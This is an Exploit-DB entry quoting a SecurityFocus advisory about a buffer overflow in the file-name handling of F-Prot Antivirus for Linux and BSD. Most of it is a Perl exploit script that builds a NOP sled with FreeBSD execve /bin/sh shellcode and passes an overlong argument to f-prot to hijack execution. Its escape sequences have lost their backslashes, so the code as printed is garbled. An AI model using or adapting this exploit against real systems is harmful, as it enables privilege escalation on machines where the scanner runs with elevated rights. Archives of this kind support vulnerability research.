https://www.exploit-db.com/exploits/22292

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/6969/info

Frisk's F-Prot Antivirus for Linux and BSD is prone to a buffer overflow in file name parameters that are passed to the command line scanner. If a backup script is launched by a privileged user to scan the filesystem scans a file with an unusually long name, arbitrary code could potentially execute on the system in the security context of the script's owner. 

#!/usr/bin/perl
# knud
$len = 1000;
$ret = 0xbfbffb7f; # on my 4.7-RELEASE
$nop = "x90";
$offset = 0;
$shellcode ="xebx0ex5ex31xc0x88x46x07x50x50x56". #freebsd 29bytes
            "xb0x3bx50xcdx80xe8xedxffxffxffx2f". #execve /bin/sh 
            "x62x69x6ex2fx73x68x23";                 #zillionATsafemode.org

if (@ARGV == 1) {
    $offset = $ARGV[0];
}
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;
print("Address: 0x", sprintf('%lx',($ret + $offset)), "n");
$new_ret = pack('l', ($ret + $offset));
for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}
local($ENV{'EGG'}) = $buffer; 
$cakeman = "ABC" . $new_ret x 247 ; 
exec("f-prot $cakeman");</PRE></BODY></HTML>